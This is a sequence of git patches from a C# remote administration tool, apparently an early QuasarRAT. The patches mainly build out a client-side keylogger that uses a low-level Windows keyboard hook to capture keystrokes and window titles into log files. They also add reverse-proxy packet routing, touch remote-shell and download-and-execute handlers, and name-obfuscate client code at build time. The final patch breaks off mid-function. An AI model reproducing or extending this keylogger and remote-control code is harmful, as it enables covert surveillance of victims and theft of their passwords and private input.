xServer.Core Initialize(); _handle = sock; - - SocketExtensions.SetKeepAliveEx(_handle, KEEP_ALIVE_INTERVAL, KEEP_ALIVE_TIME); - + _handle.SetKeepAliveEx(KEEP_ALIVE_INTERVAL, KEEP_ALIVE_TIME); _handle.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.NoDelay, true); _handle.NoDelay = true; diff --git a/Server/Core/Commands/CommandHandler.cs b/Server/Core/Commands/CommandHandler.cs index e92e05fb..9333ec22 100644 --- a/Server/Core/Commands/CommandHandler.cs +++ b/Server/Core/Commands/CommandHandler.cs @@ -507,7 +507,7 @@ namespace xServer.Core.Commands client.Value.FrmSi.lstSystem.Items.Add(lviItem); } - ListViewExtensions.AutosizeColumns(client.Value.FrmSi.lstSystem); + client.Value.FrmSi.lstSystem.AutosizeColumns(); }); } catch diff --git a/Server/Core/Extensions/ListViewExtensions.cs b/Server/Core/Extensions/ListViewExtensions.cs index c6ae8e8d..9486c55f 100644 --- a/Server/Core/Extensions/ListViewExtensions.cs +++ b/Server/Core/Extensions/ListViewExtensions.cs @@ -16,17 +16,17 @@ namespace xServer.Core.Extensions private const uint SET_COLUMN_WIDTH = 4126; private const int AUTOSIZE_USEHEADER = -2; - public static void RemoveDots(ListView targetListView) + public static void RemoveDots(this ListView targetListView) { SendMessage(targetListView.Handle, WM_CHANGEUISTATE, 65537, 0); } - public static void ChangeTheme(ListView targetListView) + public static void ChangeTheme(this ListView targetListView) { SetWindowTheme(targetListView.Handle, "Explorer", 0); } - public static void AutosizeColumns(ListView targetListView) + public static void AutosizeColumns(this ListView targetListView) { for (int lngColumn = 0; lngColumn <= (targetListView.Columns.Count - 1); lngColumn++) { diff --git a/Server/Core/Extensions/SocketExtensions.cs b/Server/Core/Extensions/SocketExtensions.cs index b6539423..4c1782b9 100644 --- a/Server/Core/Extensions/SocketExtensions.cs +++ b/Server/Core/Extensions/SocketExtensions.cs @@ -28,7 +28,7 @@ namespace xServer.Core.Extensions /// Current socket instance /// Specifies how often TCP repeats keep-alive transmissions when no response is received. TCP sends keep-alive transmissions to verify that idle connections are still active. This prevents TCP from inadvertently disconnecting active lines. /// Specifies how often TCP sends keep-alive transmissions. TCP sends keep-alive transmissions to verify that an idle connection is still active. This entry is used when the remote system is responding to TCP. Otherwise, the interval between transmissions is determined by the value of the keepAliveInterval entry. - public static void SetKeepAliveEx(Socket socket, uint keepAliveInterval, uint keepAliveTime) + public static void SetKeepAliveEx(this Socket socket, uint keepAliveInterval, uint keepAliveTime) //extension removed, Missing System.Core.dll which requires .NET FW 3.5 { var keepAlive = new TcpKeepAlive diff --git a/Server/Forms/FrmMain.cs b/Server/Forms/FrmMain.cs index 093d319c..e279dbef 100644 --- a/Server/Forms/FrmMain.cs +++ b/Server/Forms/FrmMain.cs @@ -65,8 +65,8 @@ namespace xServer.Forms _lvwColumnSorter = new ListViewColumnSorter(); lstClients.ListViewItemSorter = _lvwColumnSorter; - ListViewExtensions.RemoveDots(lstClients); - ListViewExtensions.ChangeTheme(lstClients); + lstClients.RemoveDots(); + lstClients.ChangeTheme(); } public void UpdateWindowTitle(int count, int selected) diff --git a/Server/Program.cs b/Server/Program.cs index 7c679c07..02c18955 100644 --- a/Server/Program.cs +++ b/Server/Program.cs @@ -2,6 +2,12 @@ using System.Windows.Forms; using xServer.Forms; +namespace System.Runtime.CompilerServices +{ + [AttributeUsage(AttributeTargets.Assembly | AttributeTargets.Class | AttributeTargets.Method)] + public sealed class ExtensionAttribute : Attribute { } +} + namespace xServer { internal static class Program From 69c95769a6d51756b71a5b00ba4165d48a9fc225 Mon Sep 17 00:00:00 2001 From: d3agle Date: Sat, 16 May 2015 23:07:17 -0500 Subject: [PATCH 18/20] initial keylogger hook --- Client/Core/Keylogger/KeyloggerHelpers.cs | 32 ++++- Client/Core/Keylogger/KeyloggerKeys.cs | 32 +++-- Client/Core/Keylogger/Logger.cs | 163 +++++++++++++++------- Client/Core/Keylogger/Win32.cs | 19 ++- Client/Program.cs | 16 ++- Server/Core/Build/Renamer.cs | 11 +- 6 files changed, 192 insertions(+), 81 deletions(-) diff --git a/Client/Core/Keylogger/KeyloggerHelpers.cs b/Client/Core/Keylogger/KeyloggerHelpers.cs index 3eca2ec7..2b614504 100644 --- a/Client/Core/Keylogger/KeyloggerHelpers.cs +++ b/Client/Core/Keylogger/KeyloggerHelpers.cs @@ -4,6 +4,7 @@ using System.Text; using System.Reflection; using xClient.Core.Keylogger; using System.Runtime.CompilerServices; +using System.Windows.Forms; namespace xClient.Core.Keylogger { @@ -92,17 +93,34 @@ namespace xClient.Core.Keylogger /// True if key is pressed; False if the key is not. public static bool IsKeyPressed(this short sender) { - return (sender & 0x8000) == 0x8000; + return (sender & 0x8000) != 0; } /// - /// Determines if the key code provided is in a toggled state. + /// Determines if the number lock key code provided is in a toggled state. /// - /// The code for the key. /// True if toggled on; False if toggled off. - public static bool IsKeyToggled(this short sender) + public static bool NumLockToggled() { - return (sender & 0xffff) == 0xffff; + return Control.IsKeyLocked(Keys.NumLock); + } + + /// + /// Determines if the scroll lock key code provided is in a toggled state. + /// + /// True if toggled on; False if toggled off. + public static bool ScrollLockToggled() + { + return Control.IsKeyLocked(Keys.Scroll); + } + + /// + /// Determines if the caps lock key code provided is in a toggled state. + /// + /// True if toggled on; False if toggled off. + public static bool CapsLockToggled() + { + return Control.IsKeyLocked(Keys.CapsLock); } public static string BuildString(this KeyloggerModifierKeys sender) @@ -118,14 +136,14 @@ namespace xClient.Core.Keylogger string CtrlName = KeyloggerKeys.VK_CONTROL.GetKeyloggerKeyName(); if (!string.IsNullOrEmpty(CtrlName)) - BuiltModifierKeys.Append(CtrlName + " +"); + BuiltModifierKeys.Append(CtrlName + " + "); } if (sender.AltKeyPressed) { string AltName = KeyloggerKeys.VK_MENU.GetKeyloggerKeyName(); if (!string.IsNullOrEmpty(AltName)) - BuiltModifierKeys.Append(" " + AltName + " +"); + BuiltModifierKeys.Append(AltName + " + "); } return BuiltModifierKeys.ToString(); diff --git a/Client/Core/Keylogger/KeyloggerKeys.cs b/Client/Core/Keylogger/KeyloggerKeys.cs index 05547efb..babf5479 100644 --- a/Client/Core/Keylogger/KeyloggerKeys.cs +++ b/Client/Core/Keylogger/KeyloggerKeys.cs @@ -56,19 +56,27 @@ namespace xClient.Core.Keylogger { // Modifier keys that are pressed: CtrlKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed(), + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed() || + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LCONTROL).IsKeyPressed() || + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RCONTROL).IsKeyPressed(), AltKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed(), + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed() || + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LMENU).IsKeyPressed() || + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RMENU).IsKeyPressed(), ShiftKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed(), + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed() || + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LSHIFT).IsKeyPressed() || + //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RSHIFT).IsKeyPressed(), // Modifier keys that have a state (toggle 'on' or 'off'). - CapsLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CAPITAL).IsKeyToggled(), - NumLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_NUMLOCK).IsKeyToggled(), - ScrollLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SCROLL).IsKeyToggled() + CapsLock = KeyloggerHelpers.CapsLockToggled(), + NumLock = KeyloggerHelpers.NumLockToggled(), + ScrollLock = KeyloggerHelpers.ScrollLockToggled() }; // To avoid having to repeatedly check if one of the modifier // keys (besides shift and caps lock) was set, just simply // decide and then store it right here. - ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed || - ModifierKeys.NumLock || ModifierKeys.ScrollLock); + ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed); } } @@ -178,7 +186,7 @@ namespace xClient.Core.Keylogger /// /// SPACEBAR key. /// - [KeyloggerKey("SPACE", true)] + [KeyloggerKey(" ")] VK_SPACE = 0x20, /// @@ -793,37 +801,37 @@ namespace xClient.Core.Keylogger /// /// Left SHIFT key. /// - [KeyloggerKey("LSHIFT", true)] + [KeyloggerKey("SHIFT", true)] VK_LSHIFT = 0xA0, /// /// Right SHIFT key. /// - [KeyloggerKey("RSHIFT", true)] + [KeyloggerKey("SHIFT", true)] VK_RSHIFT = 0xA1, /// /// Left CONTROL (CTRL) key. /// - [KeyloggerKey("LCTRL", true)] + [KeyloggerKey("CTRL", true)] VK_LCONTROL = 0xA2, /// /// Right CONTROL (CTRL) key. /// - [KeyloggerKey("RCTRL", true)] + [KeyloggerKey("CTRL", true)] VK_RCONTROL = 0xA3, /// /// Left MENU key. /// - [KeyloggerKey("LALT", true)] + [KeyloggerKey("ALT", true)] VK_LMENU = 0xA4, /// /// Right MENU key. /// - [KeyloggerKey("RALT", true)] + [KeyloggerKey("ALT", true)] VK_RMENU = 0xA5, /// diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index f01c166d..a35a5c2b 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -1,11 +1,9 @@ using System; using System.Collections.Generic; using System.IO; -using System.Runtime.InteropServices; using System.Text; -using System.Threading; using System.Windows.Forms; -using xClient.Core.Keylogger; +using System.Diagnostics; namespace xClient.Core.Keylogger { @@ -13,13 +11,11 @@ namespace xClient.Core.Keylogger { public static Logger Instance; + private bool IsEnabled = false; public bool Enabled { - get { return _timerLogKeys.Enabled && _timerFlush.Enabled && _timerEmptyKeyBuffer.Enabled; } - set - { - _timerLogKeys.Enabled = _timerFlush.Enabled = _timerEmptyKeyBuffer.Enabled = value; - } + get { return this.IsEnabled; } + set { SetHook(value); } } private StringBuilder _logFileBuffer; @@ -31,15 +27,34 @@ namespace xClient.Core.Keylogger private readonly KeyloggerKeys[] _allKeys; private readonly KeyloggerKeys[] _specialKeys; + private readonly List _keysDown = new List(); private volatile List _keyBuffer; - private readonly System.Timers.Timer _timerLogKeys; private readonly System.Timers.Timer _timerEmptyKeyBuffer; private readonly System.Timers.Timer _timerFlush; + public struct KeyData + { + public int vkCode; + public int scanCode; + public int flags; + public int time; + public int dwExtraInfo; + } + + private const int WM_KEYDOWN = 0x100; + private const int WM_KEYUP = 0x101; + private const int WM_SYSKEYDOWN = 0x104; + private const int WM_SYSKEYUP = 0x105; + private const int WH_KEYBOARD_LL = 13; + + public delegate int HookProcDelegate(int nCode, int wParam, ref KeyData lParam); + private HookProcDelegate _hook; + + private IntPtr _hookHandle; + /// /// Creates the logging class that provides keylogging functionality. /// - /// The interval, in milliseconds, to flush the contents of the keylogger to the file. public Logger(double flushInterval) { Instance = this; @@ -52,9 +67,6 @@ namespace xClient.Core.Keylogger _keyBuffer = new List(); - this._timerLogKeys = new System.Timers.Timer { Enabled = false, Interval = 10 }; - this._timerLogKeys.Elapsed += this.timerLogKeys_Elapsed; - this._timerEmptyKeyBuffer = new System.Timers.Timer { Enabled = false, Interval = 500 }; this._timerEmptyKeyBuffer.Elapsed += this.timerEmptyKeyBuffer_Elapsed; @@ -137,6 +149,76 @@ namespace xClient.Core.Keylogger } } + private int HookProc(int nCode, int wParam, ref KeyData lParam) + { + if (nCode >= 0) + { + KeyloggerKeys key = (KeyloggerKeys) lParam.vkCode; + + if (wParam == WM_KEYUP || wParam == WM_SYSKEYUP) + { + _keysDown.RemoveAll(k => k == key); + } + + if ((wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)) + { + if (!_keysDown.Contains(key)) + { + try + { + LoggedKey KeyToLog = new LoggedKey() + { + PressedKey = key + }; + KeyToLog.RecordModifierKeys(); + + _keyBuffer.Add(KeyToLog); + _hWndTitle = GetActiveWindowTitle(); //Get active thread window title + + if (!string.IsNullOrEmpty(_hWndTitle)) + { + // Only write the title to the log file if the names are different. + if (_hWndTitle != _hWndLastTitle) + { + _hWndLastTitle = _hWndTitle; + _logFileBuffer.Append("

[" + _hWndTitle + "]
"); + } + } + } + catch + { + } + + _keysDown.Add(key); + } + } + } + + return Win32.CallNextHookEx(_hookHandle, nCode, wParam, ref lParam); + } + + private void SetHook(bool enable) + { + switch (enable) + { + case true: + _hook = new HookProcDelegate(HookProc); + _hookHandle = Win32.SetWindowsHookEx(WH_KEYBOARD_LL, _hook, Win32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0); + //hook installed, enabled + _timerFlush.Enabled = true; + _timerEmptyKeyBuffer.Enabled = true; + IsEnabled = true; + Application.Run(); + Win32.UnhookWindowsHookEx(_hookHandle); + break; + case false: + _timerFlush.Enabled = false; + _timerEmptyKeyBuffer.Enabled = false; + Application.ExitThread(); + break; + } + } + private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { int j = 0; @@ -208,40 +290,6 @@ namespace xClient.Core.Keylogger } } - private void timerLogKeys_Elapsed(object sender, System.Timers.ElapsedEventArgs e) - { - // Loop through each value in the array of keys to record. - foreach (byte i in _allKeys) - { - // GetAsycKeyState returns the result by setting the most significant - // bit if the key is up, and sets the least significant bit if the - // key was pressed. - if (Win32.GetAsyncKeyState(i) == -32767) - { - try - { - LoggedKey KeyToLog = new LoggedKey() { PressedKey = (KeyloggerKeys)i }; - KeyToLog.RecordModifierKeys(); - - _keyBuffer.Add(KeyToLog); - _hWndTitle = GetActiveWindowTitle(); //Get active thread window title - - if (!string.IsNullOrEmpty(_hWndTitle)) - { - // Only write the title to the log file if the names are different. - if (_hWndTitle != _hWndLastTitle) - { - _hWndLastTitle = _hWndTitle; - _logFileBuffer.Append("

[" + _hWndTitle + "]
"); - } - } - } - catch - { } - } - } - } - private void timerFlush_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { if (_logFileBuffer.Length > 0) @@ -318,14 +366,23 @@ namespace xClient.Core.Keylogger //The keys we are interested in are modifier keys such as shift and caps lock byte[] keyStates = new byte[256]; - keyStates[(int)KeyloggerKeys.VK_SHIFT] = (key.ModifierKeys.ShiftKeyPressed && AllowCapitalization) ? (byte)128 : (byte)0; - keyStates[(int)KeyloggerKeys.VK_CAPITAL] = (key.ModifierKeys.CapsLock && AllowCapitalization) ? (byte)128 : (byte)0; + if (key.ModifierKeys.ShiftKeyPressed && AllowCapitalization) + keyStates[(int)KeyloggerKeys.VK_SHIFT] = 0x80; - keyStates[(int)KeyloggerKeys.VK_MENU] = key.ModifierKeys.CtrlKeyPressed ? (byte)128 : (byte)0; - keyStates[(int)KeyloggerKeys.VK_CONTROL] = key.ModifierKeys.AltKeyPressed ? (byte)128 : (byte)0; + if (key.ModifierKeys.CtrlKeyPressed) + keyStates[(int)KeyloggerKeys.VK_CONTROL] = 0x80; - keyStates[(int)KeyloggerKeys.VK_NUMLOCK] = key.ModifierKeys.NumLock ? (byte)128 : (byte)0; - keyStates[(int)KeyloggerKeys.VK_SCROLL] = key.ModifierKeys.ScrollLock ? (byte)128 : (byte)0; + if (key.ModifierKeys.AltKeyPressed) + keyStates[(int)KeyloggerKeys.VK_MENU] = 0x80; + + if (key.ModifierKeys.CapsLock && AllowCapitalization) + keyStates[(int)KeyloggerKeys.VK_CAPITAL] = 0x01; + + if (key.ModifierKeys.NumLock) + keyStates[(int)KeyloggerKeys.VK_NUMLOCK] = 0x01; + + if (key.ModifierKeys.ScrollLock) + keyStates[(int)KeyloggerKeys.VK_SCROLL] = 0x01; var sb = new StringBuilder(10); diff --git a/Client/Core/Keylogger/Win32.cs b/Client/Core/Keylogger/Win32.cs index f8eb5309..c3571119 100644 --- a/Client/Core/Keylogger/Win32.cs +++ b/Client/Core/Keylogger/Win32.cs @@ -1,10 +1,6 @@ using System; -using System.Collections.Generic; -using System.IO; using System.Runtime.InteropServices; using System.Text; -using System.Threading; -using System.Windows.Forms; namespace xClient.Core.Keylogger { @@ -49,5 +45,20 @@ namespace xClient.Core.Keylogger [DllImport("user32.dll", ExactSpelling = true)] internal static extern IntPtr GetKeyboardLayout(uint threadId); + + [DllImport("kernel32.dll")] + internal static extern IntPtr LoadLibrary(string lpFileName); + + [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)] + internal static extern IntPtr SetWindowsHookEx(int hookID, Logger.HookProcDelegate callback, IntPtr hInstance, int threadID); + + [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)] + internal static extern bool UnhookWindowsHookEx(IntPtr hookHandle); + + [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)] + internal static extern int CallNextHookEx(IntPtr hookHandle, int nCode, int wParam, ref Logger.KeyData lParam); + + [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] + internal static extern IntPtr GetModuleHandle(string lpModuleName); } } \ No newline at end of file diff --git a/Client/Program.cs b/Client/Program.cs index 7794adaa..cff2efe7 100644 --- a/Client/Program.cs +++ b/Client/Program.cs @@ -7,6 +7,7 @@ using xClient.Core; using xClient.Core.Commands; using xClient.Core.Keylogger; using xClient.Core.Packets; +using xClient.Core.ReverseProxy; namespace System.Runtime.CompilerServices { @@ -98,7 +99,11 @@ namespace xClient typeof (Core.Packets.ClientPackets.MonitorsResponse), typeof (Core.Packets.ClientPackets.ShellCommandResponse), typeof (Core.Packets.ClientPackets.GetStartupItemsResponse), - typeof (Core.Packets.ClientPackets.GetLogsResponse) + typeof (Core.Packets.ClientPackets.GetLogsResponse), + typeof (Core.ReverseProxy.Packets.ReverseProxyConnect), + typeof (Core.ReverseProxy.Packets.ReverseProxyConnectResponse), + typeof (Core.ReverseProxy.Packets.ReverseProxyData), + typeof (Core.ReverseProxy.Packets.ReverseProxyDisconnect) }); ConnectClient.ClientState += ClientState; @@ -330,7 +335,14 @@ namespace xClient } else if (type == typeof(Core.Packets.ServerPackets.GetLogs)) { - CommandHandler.HandleGetLogs((Core.Packets.ServerPackets.GetLogs) packet, client); + CommandHandler.HandleGetLogs((Core.Packets.ServerPackets.GetLogs)packet, client); + } + else if (type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnect) || + type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnectResponse) || + type == typeof(Core.ReverseProxy.Packets.ReverseProxyData) || + type == typeof(Core.ReverseProxy.Packets.ReverseProxyDisconnect)) + { + ReverseProxyCommandHandler.HandleCommand(client, packet); } } } diff --git a/Server/Core/Build/Renamer.cs b/Server/Core/Build/Renamer.cs index 5ee961f7..4d5ea7ae 100644 --- a/Server/Core/Build/Renamer.cs +++ b/Server/Core/Build/Renamer.cs @@ -58,9 +58,14 @@ namespace xServer.Core.Build private void RenameInType(TypeDefinition typeDef) { - if (typeDef.Namespace.StartsWith("My") || typeDef.Namespace.StartsWith("xClient.Core.Packets") || - typeDef.Namespace == "xClient.Core" || typeDef.Namespace == "xClient.Core.Elevation" || - typeDef.Namespace == "xClient.Core.Compression" || typeDef.Namespace.StartsWith("ProtoBuf")) + if (typeDef.Namespace.StartsWith("My") + || typeDef.Namespace.StartsWith("xClient.Core.Packets") + || typeDef.Namespace == "xClient.Core" + || typeDef.Namespace == "xClient.Core.Elevation" + || typeDef.Namespace == "xClient.Core.Compression" + || typeDef.Namespace.StartsWith("ProtoBuf") + || typeDef.Namespace.Contains("xClient.Core.ReverseProxy") + || typeDef.Namespace.Contains("xClient.Core.Keylogger")) return; TypeOverloader.GiveName(typeDef); From bfc4333dbb3fc4ea136d3ac75bb164ac2df225c1 Mon Sep 17 00:00:00 2001 From: MaxXor Date: Tue, 19 May 2015 08:26:58 +0200 Subject: [PATCH 19/20] Small RemoteShell fix --- Client/Core/Commands/MiscHandler.cs | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Client/Core/Commands/MiscHandler.cs b/Client/Core/Commands/MiscHandler.cs index 65500e82..e8fb7f6e 100644 --- a/Client/Core/Commands/MiscHandler.cs +++ b/Client/Core/Commands/MiscHandler.cs @@ -69,7 +69,8 @@ namespace xClient.Core.Commands public static void CloseShell() { - _shell.Dispose(); + if (_shell != null) + _shell.Dispose(); } public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command, From 12ed28267d01837bb2458cccd71eca894b4d9ef2 Mon Sep 17 00:00:00 2001 From: d3agle Date: Tue, 19 May 2015 03:19:09 -0500 Subject: [PATCH 20/20] Keylogger hook implementation - barebones --- Client/Core/Keylogger/KeyloggerHelpers.cs | 39 ++-- Client/Core/Keylogger/KeyloggerKeys.cs | 24 +- Client/Core/Keylogger/Logger.cs | 269 +++++++--------------- Client/Program.cs | 12 - 4 files changed, 107 insertions(+), 237 deletions(-) diff --git a/Client/Core/Keylogger/KeyloggerHelpers.cs b/Client/Core/Keylogger/KeyloggerHelpers.cs index 2b614504..e53baa3d 100644 --- a/Client/Core/Keylogger/KeyloggerHelpers.cs +++ b/Client/Core/Keylogger/KeyloggerHelpers.cs @@ -97,30 +97,13 @@ namespace xClient.Core.Keylogger } /// - /// Determines if the number lock key code provided is in a toggled state. + /// Determines if the key code provided is in a toggled state. /// + /// The code for the key. /// True if toggled on; False if toggled off. - public static bool NumLockToggled() + public static bool IsKeyToggled(this short sender) { - return Control.IsKeyLocked(Keys.NumLock); - } - - /// - /// Determines if the scroll lock key code provided is in a toggled state. - /// - /// True if toggled on; False if toggled off. - public static bool ScrollLockToggled() - { - return Control.IsKeyLocked(Keys.Scroll); - } - - /// - /// Determines if the caps lock key code provided is in a toggled state. - /// - /// True if toggled on; False if toggled off. - public static bool CapsLockToggled() - { - return Control.IsKeyLocked(Keys.CapsLock); + return (sender & 0x0001) != 0; } public static string BuildString(this KeyloggerModifierKeys sender) @@ -145,6 +128,20 @@ namespace xClient.Core.Keylogger if (!string.IsNullOrEmpty(AltName)) BuiltModifierKeys.Append(AltName + " + "); } + if (sender.ShiftKeyPressed) + { + string ShiftName = KeyloggerKeys.VK_SHIFT.GetKeyloggerKeyName(); + + if (!string.IsNullOrEmpty(ShiftName)) + BuiltModifierKeys.Append(ShiftName + " + "); + } + if (sender.WindowsKeyPressed) + { + string WinName = KeyloggerKeys.VK_LWIN.GetKeyloggerKeyName(); + + if (!string.IsNullOrEmpty(WinName)) + BuiltModifierKeys.Append(WinName + " + "); + } return BuiltModifierKeys.ToString(); } diff --git a/Client/Core/Keylogger/KeyloggerKeys.cs b/Client/Core/Keylogger/KeyloggerKeys.cs index babf5479..151f3802 100644 --- a/Client/Core/Keylogger/KeyloggerKeys.cs +++ b/Client/Core/Keylogger/KeyloggerKeys.cs @@ -20,10 +20,10 @@ namespace xClient.Core.Keylogger public bool ShiftKeyPressed { get; set; } public bool AltKeyPressed { get; set; } public bool CtrlKeyPressed { get; set; } - public bool CapsLock { get; set; } public bool NumLock { get; set; } public bool ScrollLock { get; set; } + public bool WindowsKeyPressed { get; set; } } /// @@ -36,10 +36,12 @@ namespace xClient.Core.Keylogger /// Gets the key that was pressed. /// public KeyloggerKeys PressedKey { get; set; } + /// /// An object with the purpose of storing the states of modifier keys. /// public KeyloggerModifierKeys ModifierKeys { get; private set; } + /// /// Determines if one of the modifier keys (excluding shift and caps /// lock) has been set. @@ -56,27 +58,21 @@ namespace xClient.Core.Keylogger { // Modifier keys that are pressed: CtrlKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed(), - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed() || - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LCONTROL).IsKeyPressed() || - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RCONTROL).IsKeyPressed(), AltKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed(), - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed() || - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LMENU).IsKeyPressed() || - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RMENU).IsKeyPressed(), ShiftKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed(), - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed() || - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LSHIFT).IsKeyPressed() || - //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RSHIFT).IsKeyPressed(), // Modifier keys that have a state (toggle 'on' or 'off'). - CapsLock = KeyloggerHelpers.CapsLockToggled(), - NumLock = KeyloggerHelpers.NumLockToggled(), - ScrollLock = KeyloggerHelpers.ScrollLockToggled() + CapsLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CAPITAL).IsKeyToggled(), + NumLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_NUMLOCK).IsKeyToggled(), + ScrollLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SCROLL).IsKeyToggled(), + WindowsKeyPressed = + Win32.GetAsyncKeyState(KeyloggerKeys.VK_LWIN).IsKeyToggled() || + Win32.GetAsyncKeyState(KeyloggerKeys.VK_RWIN).IsKeyToggled() }; // To avoid having to repeatedly check if one of the modifier // keys (besides shift and caps lock) was set, just simply // decide and then store it right here. - ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed); + ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed || ModifierKeys.WindowsKeyPressed); } } diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index a35a5c2b..92e384e5 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -4,6 +4,7 @@ using System.IO; using System.Text; using System.Windows.Forms; using System.Diagnostics; +using System.Runtime.InteropServices; namespace xClient.Core.Keylogger { @@ -25,11 +26,8 @@ namespace xClient.Core.Keylogger private readonly string _filePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\"; - private readonly KeyloggerKeys[] _allKeys; - private readonly KeyloggerKeys[] _specialKeys; - private readonly List _keysDown = new List(); - private volatile List _keyBuffer; - private readonly System.Timers.Timer _timerEmptyKeyBuffer; + private LoggedKey keyToLog; + private readonly List _keysDown = new List(); private readonly System.Timers.Timer _timerFlush; public struct KeyData @@ -50,7 +48,7 @@ namespace xClient.Core.Keylogger public delegate int HookProcDelegate(int nCode, int wParam, ref KeyData lParam); private HookProcDelegate _hook; - private IntPtr _hookHandle; + private IntPtr _hookHandle = IntPtr.Zero; /// /// Creates the logging class that provides keylogging functionality. @@ -62,81 +60,12 @@ namespace xClient.Core.Keylogger WriteFile(); - _allKeys = GetKeyloggerKeys(); - _specialKeys = GetSpecialKeys(); - - _keyBuffer = new List(); - - this._timerEmptyKeyBuffer = new System.Timers.Timer { Enabled = false, Interval = 500 }; - this._timerEmptyKeyBuffer.Elapsed += this.timerEmptyKeyBuffer_Elapsed; - this._timerFlush = new System.Timers.Timer { Enabled = false, Interval = flushInterval }; this._timerFlush.Elapsed += this.timerFlush_Elapsed; this._logFileBuffer = new StringBuilder(); } - /// - /// Retrieves an array of all keylogger keys that are special. - /// - /// - private KeyloggerKeys[] GetSpecialKeys() - { - List SpecialKeys = new List(); - - try - { - foreach (KeyloggerKeys key in _allKeys) - { - try - { - if (key.IsSpecialKey()) - { - SpecialKeys.Add(key); - } - } - catch - { } - } - } - catch - { } - - return SpecialKeys.ToArray(); - } - - /// - /// Retrieves an array of all keylogger keys that are supported. - /// - /// - private KeyloggerKeys[] GetKeyloggerKeys() - { - List NormalKeys = new List(); - - try - { - foreach (KeyloggerKeys key in Enum.GetValues(typeof(KeyloggerKeys))) - { - try - { - // Must be supported (have a string representation of the key). - if (!string.IsNullOrEmpty(key.GetKeyloggerKeyName())) - { - NormalKeys.Add(key); - } - } - catch - { } - } - - return NormalKeys.ToArray(); - } - catch - { - return new KeyloggerKeys[0]; - } - } - private string HighlightSpecialKey(string name) { if (!string.IsNullOrEmpty(name)) @@ -153,44 +82,82 @@ namespace xClient.Core.Keylogger { if (nCode >= 0) { - KeyloggerKeys key = (KeyloggerKeys) lParam.vkCode; - - if (wParam == WM_KEYUP || wParam == WM_SYSKEYUP) + switch (wParam) { - _keysDown.RemoveAll(k => k == key); - } + case WM_KEYDOWN: + case WM_SYSKEYDOWN: + //TODO - handle modifier keys in a better way + // + // If a user presses only the control key and then decides to press a, so the combination would be ctrl + a, it will log [CTRL][CTRL + a] + // perhaps some sort of filter? + keyToLog = new LoggedKey(); + keyToLog.PressedKey = (KeyloggerKeys)lParam.vkCode; - if ((wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)) - { - if (!_keysDown.Contains(key)) - { - try + if (!_keysDown.Contains(keyToLog)) { - LoggedKey KeyToLog = new LoggedKey() + try { - PressedKey = key - }; - KeyToLog.RecordModifierKeys(); - - _keyBuffer.Add(KeyToLog); - _hWndTitle = GetActiveWindowTitle(); //Get active thread window title - - if (!string.IsNullOrEmpty(_hWndTitle)) - { - // Only write the title to the log file if the names are different. - if (_hWndTitle != _hWndLastTitle) + _hWndTitle = GetActiveWindowTitle(); //Get active thread window title + if (!string.IsNullOrEmpty(_hWndTitle)) { - 